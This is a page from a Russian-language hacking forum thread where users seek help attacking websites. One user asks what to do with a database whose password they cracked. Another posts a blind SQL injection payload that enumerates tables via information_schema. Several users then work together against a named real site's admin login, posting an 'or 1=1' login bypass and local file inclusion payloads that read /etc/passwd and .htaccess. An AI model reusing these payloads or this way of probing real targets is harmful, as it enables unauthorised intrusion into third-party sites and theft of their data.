HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1135 из 2438 « Первая < 135635103510851125 1131 1132 1133 1134 1135 1136 1137 1138 1139 11451185123516352135 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11341  
Старый 24.01.2010, 18:55
sNt
Участник форума
Регистрация: 30.07.2008
Сообщений: 152
С нами: 9358231

Репутация: 34
По умолчанию
Чо делать после с базой после расшифровки паса? Я тут одну вскрыл, но хз, что с ней делать. И как найти админку? КУды входить по этому пасу?
Последний раз редактировалось sNt; 24.01.2010 в 19:03..
 
Ответить с цитированием

  #11342  
Старый 24.01.2010, 20:17
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
Цитата:
Сообщение от ElteRUS  
YuNi|[c,

https://forum.antichat.ru/showpost.php?p=1734696&postcount=12
https://forum.antichat.ru/showpost.php?p=1734851&postcount=13
ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
 
Ответить с цитированием

  #11343  
Старый 24.01.2010, 21:40
ronald
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
С нами: 9538880

Репутация: 83
По умолчанию
Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php
 
Ответить с цитированием

  #11344  
Старый 24.01.2010, 21:44
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
Цитата:
Сообщение от ronald  
Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php
а с чего ты вззял что там скуля?
 
Ответить с цитированием

  #11345  
Старый 24.01.2010, 21:45
ronald
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
С нами: 9538880

Репутация: 83
По умолчанию
Упс, там случилось что-то, не работает скрипт, ещё вчера была форма входа с sql
Извиняюсь, ссылка битая теперь тут всё это лежит: http://dmironova.ru/admin/?lang=no
 
Ответить с цитированием

  #11346  
Старый 24.01.2010, 21:46
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию
Цитата:
Сообщение от Gorev  
а с чего ты вззял что там скуля?
http://dmironova.ru/admin/
'or 1=1/*

http://dmironova.ru/admin/login.php?lang=../../../../../../etc/passwd%00
Последний раз редактировалось v1d0qz; 24.01.2010 в 21:58..
 
Ответить с цитированием

  #11347  
Старый 24.01.2010, 21:50
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию
Цитата:
http://dmironova.ru/admin/login.php?lang=hjhj
Цитата:
Warning: include_once(/home/dmironova/dmironova.ru/docs/admin/language/hjhj/admin/total.php) [function.include-once]: failed to open stream: No such file or directory in /home/dmironova/dmironova.ru/docs/admin/function.php(1) : eval()'d code on line 179
инклуд?
 
Ответить с цитированием

  #11348  
Старый 24.01.2010, 21:55
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Цитата:
Сообщение от jecka3000  
инклуд?
http://dmironova.ru/admin/login.php?lang=/../../../../../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #11349  
Старый 24.01.2010, 21:55
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Цитата:
Сообщение от jecka3000  
инклуд?
Да, инклуд.
Код:
http://dmironova.ru/admin/login.php?lang=../../.htaccess%00
 
Ответить с цитированием

  #11350  
Старый 25.01.2010, 12:59
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
Цитата:
Сообщение от YuNi|[c  
ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
А то, что по второй ссылке прочитал ? Там показано как использовать лимит при фильтрации запятых.

Вот похожая ситуация
https://forum.antichat.ru/showpost.php?p=1550051

Разберись что и как и подгони запрос под свою скулю.
 
Ответить с цитированием
Ответ
Страница 1135 из 2438 « Первая < 135635103510851125 1131 1132 1133 1134 1135 1136 1137 1138 1139 11451185123516352135 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...